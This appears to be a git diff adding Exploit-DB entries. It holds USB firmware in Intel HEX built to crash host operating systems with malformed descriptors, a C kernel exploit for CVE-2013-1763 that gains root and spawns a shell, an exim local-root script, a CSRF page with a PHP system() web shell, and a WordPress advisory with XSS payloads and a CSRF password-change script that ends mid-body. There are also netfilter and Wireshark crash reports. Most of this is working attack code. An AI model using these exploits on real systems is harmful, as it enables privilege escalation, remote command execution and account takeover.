:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A
:100670008491882349F190E0880F991FFC01E25C86
:10068000FE4FA591B491805D9E4FFC01C591D49120
:100690009FB7611108C0F8948C91209582238C93A8
:1006A000888182230AC0623051F4F8948C91322FF1
:1006B000309583238C938881822B888304C0F8949F
:1006C0008C91822B8C939FBFDF91CF9108950F93D4
:1006D0001F93CF93DF931F92CDB7DEB7282F30E063
:1006E000F901E853FF4F8491F901EA51FF4F14914A
:1006F000F901EC5FFE4F04910023C9F0882321F03B
:1007000069830E94F5026981E02FF0E0EE0FFF1F80
:10071000E05DFE4FA591B4919FB7F8948C91611163
:1007200003C01095812301C0812B8C939FBF0F9034
:10073000DF91CF911F910F910895CF93DF93282FD1
:1007400030E0F901E853FF4F8491F901EA51FF4F7E
:10075000D491F901EC5FFE4FC491CC2391F081114B
:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52
:10077000A591B4912C912D2381E090E021F480E0AB
:1007800002C080E090E0DF91CF910895615030F099
:100790002091F100FC0120830196F8CF289884E68F
:1007A00080937D0508951092E900109271051092D2
:1007B000700590936F0580936E050895FF920F93D7
:1007C0001F93CF93DF93F82E8B01EA01BA01C80182
:1007D0000E94A406F80120E030E08EEF2C173D07C0
:1007E00091F1F7FE02C0A49101C0A0816091700553
:1007F0007091710540916E0550916F0564177507F2
:10080000ACF49091E8009570E1F39091E80092FDCE
:100810001CC0A093F100A0917005B09171051196D4
:10082000AF73BB27AB2B11F48093E800A091700548
:10083000B09171051196B0937105A09370052F5F6B
:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1
:10085000CF911F910F91FF9008951F920F920FB6A5
:100860000F9211246F927F928F929F92AF92BF92BC
:10087000CF92DF92EF92FF920F931F932F933F93AC
:100880004F935F936F937F938F939F93AF93BF9398
:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1
:1008A000CDBF1092E9008091E80083FF46C168E067
:1008B000CE010A960E94C60382EF8093E8009A85D3
:1008C00097FF05C08091E80080FFFCCF03C08EEF4A
:1008D0008093E800892F807609F023C18B858111F0
:1008E00005C01092F1001092F10020C1282F2D7F39
:1008F000213009F41BC1853049F48091E80080FF64
:10090000FCCF8C8580688093E30010C1863009F0AD
:10091000E1C02D8508891989223009F0B3C0EC8423
:100920008E2D90E020917305309174058217930706
:100930000CF09FC00E94D3031F92EF928DE394E0CE
:100940009F938F930E9481068CE0E89E7001112492
:10095000E0917505F0917605EE0DFF1D89E0DE0151
:10096000119601900D928A95E1F7C8010E94D30378
:1009700049E050E0BE016F5F7F4F80E00E94DE03E0
:100980000F900F900F900F90C12CD12C612C712CD7
:1009900033E7A32E34E0B32E4AEA842E44E0942EAB
:1009A000E0917505F0917605EE0DFF1D818590E0D3
:1009B000681679060CF0BAC07F926F92BF92AF9220
:1009C0000E948106E0917505F0917605EE0DFF1D00
:1009D000628573856C0D7D1D49E050E080E00E94CA
:1009E000DE030F900F900F900F9000E010E0E09169
:1009F0007505F0917605EE0DFF1D0284F385E02D5F
:100A0000EC0DFD1D818590E0081719075CF51F931B
:100A10000F939F928F920E948106E0917505F0914D
:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16
:100A3000C801880F991FA485B585A80FB91F4D91CE
:100A40005C910284F385E02DE80FF91F60817181CC
:100A500080E00E94DE030F5F1F4F0F900F900F90FA
:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0
:100A700097CF8FED94E09F938F930E9481060F9004
:100A80000F9058C0C8012A8B0E94D3032A892130B5
:100A9000C1F0233009F04EC08C851F928F9389EFEF
:100AA00094E09F938F930E94810642E050E062E8B9
:100AB00071E080E00E94DE030F900F900F900F9086
:100AC00035C04091000150E060E071E080E00E949C
:100AD000DE032CC0873071F1883021F481E08093EF
:100AE000F10024C0893011F5937021F5EDE4F1E0B7
:100AF00081E021E096E38093E9002093EB003491BC
:100B00003093EC009093ED008F5F3196843099F72D
:100B10008EE78093EA001092EA008C85809372053C
:100B200005C0888999890E94D30304C08EEF809301
:100B3000E80003C081E28093EB0062960FB6F89460
:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F
:100B5000AF919F918F917F916F915F914F913F9155
:100B60002F911F910F91FF90EF90DF90CF90BF904A
:100B7000AF909F908F907F906F900F900FBE0F90CF
:100B80001F9018951F920F920FB60F9211248F93FA
:100B90009F938091E1001092E10083FF0FC01092BB
:100BA000E90091E09093EB001092EC0092E39093B7
:100BB000ED001092720598E09093F00082FF1AC049
:100BC00080917E05882339F080917E058150809345
:100BD0007E05882369F080917D05882359F08091F6
:100BE0007D05815080937D05811104C0289A02C043
:100BF0005D9AF1CF9F918F910F900FBE0F901F9034
:100C00001895CF93DF93CDB7DEB782E1FE0135961D
:100C1000A0E0B1E001900D928A95E1F78F89988D5F
:100C20009093760580937505898D9A8D90937405C0
:100C3000809373058B8D9C8D90937C0580937B05B1
:100C40008D8D9E8D90937A05809379058F8D98A1D7
:100C500090937805809377051092720581E08093D8
:100C6000D70080EA8093D80082E189BD09B400FEF4
:100C7000FDCF61E070E080E090E00E94790280E9C1
:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040580403500001010203010902BA
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF

23
platforms/linux/dos/39545.txt Executable file
View file

@ -0,0 +1,23 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=758
A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing.
In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset:
newpos = pos + e->next_offset;
...
e = (struct ipt_entry *) (entry0 + newpos);
e->counters.pcnt = pos;
This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero.
This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well.
Furthermore, a recent refactoring cof this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4.
Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl!
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39545.zip

164
platforms/linux/local/33336.c Executable file
View file

@ -0,0 +1,164 @@
/*
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
*
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table->hash.rehash_time, index 81
*
* Fedora 18 support added
*
* 2/2013
*/
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
int jump_payload_not_used(void *skb, void *nlh)
{
asm volatile (
"mov $kernel_code, %eax\n"
"call *%eax\n"
);
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym[512];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (!f) {
return 0;
}
while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
if (ret == 0) {
fscanf(f, "%s\n", sym);
continue;
}
if (!strcmp(name, sym)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char*argv[])
{
int fd;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
//req.r.sdiag_family = 89;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
if(argc==1){
printf("Run: %s Fedora|Ubuntu\n",argv[0]);
return 0;
}
else if(strcmp(argv[1],"Fedora")==0){
commit_creds = (_commit_creds) get_symbol("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
sock_diag_handlers = get_symbol("sock_diag_handlers");
nl_table = get_symbol("nl_table");
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
printf("some symbols are not available!\n");
exit(1);
}
family = (nl_table - sock_diag_handlers) / 4;
printf("family=%d\n",family);
req.r.sdiag_family = family;
if(family>255){
printf("nl_table is too far!\n");
exit(1);
}
}
else if(strcmp(argv[1],"Ubuntu")==0){
commit_creds = (_commit_creds) 0xc106bc60;
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
req.r.sdiag_family = 81;
}
unsigned long mmap_start, mmap_size;
mmap_start = 0x10000;
mmap_size = 0x120000;
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}
memset((void*)mmap_start, 0x90, mmap_size);
char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
unsigned long *asd = &jump[4];
*asd = (unsigned long)kernel_code;
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
if ( send(fd, &req, sizeof(req), 0) < 0) {
printf("bad send\n");
close(fd);
return -1;
}
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
if(!getuid())
system("/bin/sh");
}

23
platforms/linux/local/39535.sh Executable file
View file

@ -0,0 +1,23 @@
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

71
platforms/multiple/dos/39529.txt Executable file
View file

@ -0,0 +1,71 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=739
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
#0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
#1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#3 0x51e4bc in main wireshark/tshark.c:2213:13
0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
#0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
#2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#4 0x51e4bc in main wireshark/tshark.c:2213:13
previously allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
#3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
#4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
#5 0x51e4bc in main wireshark/tshark.c:2213:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6853==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip

42
platforms/php/webapps/39534.html Executable file
View file

@ -0,0 +1,42 @@
<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>

148
platforms/php/webapps/39536.txt Executable file
View file

@ -0,0 +1,148 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 ===
Wordpress ProjectTheme Multiple Vulnerabilities
- - ------------------------------------------------------------
Affected Version
================
Project Theme: 2.0.9.5
Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: low
Vendor: http://sitemile.com/
Credits: LSE Leading Security Experts GmbH employee Tim Herres
Advisory: https://www.lsexperts.de/advisories/lse-2016-01-01.txt
Advisory Status: public
CVE-Number: [NA yet]
Problem Impact
==============
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding. This means user supplied input is inserted in a unsafe way.
This could allow a remote attacker to easily compromise user accounts.
Example:
An authenticated user sends a private message to another user.
When the attacker injects JavaScript Code, it will automatically call the CSRF Proc below.
The only necessary information is the user id, which can be identified easily, see below.
If the other user opens the private message menu, the JavaScript code gets executed and the Password will be changed. It is not necessary to open the message.
Now the attacker can access the account using the new password.
Problem Description
===================
The following findings are only examples, the whole application should be reviewed for similar vulnerabilities.
#Stored Cross Site Scripting:
Creating a new project http://[URL]/post-new/? in the project title and description field.
Insert JavaScript code inside the project message board:
POST /?get_message_board=34 HTTP/1.1
sumbit_message=1&my_message=TestMessagBoard<script>alert("stored_xss")</script>
Also in the private message in the subject or in the message field. The payload in the Subject will be executed, if the user opens the private message list.
#Reflected Cross Site Scripting:
http://[IP]/advanced-search/?term=asdf&%22%3E%3Cscript%3Ealert%2811%29%3C%2fscript%3E
# No protection against Cross Site Request Forgery Attacks
There is no Cross Site Request Forgery protection.
Also the user password can be changed without knowledge of the current password.
A possible CSRF attack form, which will change the users password to "test":
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://[ip]/my-account/personal-information/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarywXBZovhmb3VnFJdz");
xhr.setRequestHeader("Accept-Language", "de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4");
xhr.withCredentials = true;
var body = "------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"project_location_cat\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_city\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_description\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"test\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"reppassword\"\r\n" +
"\r\n" +
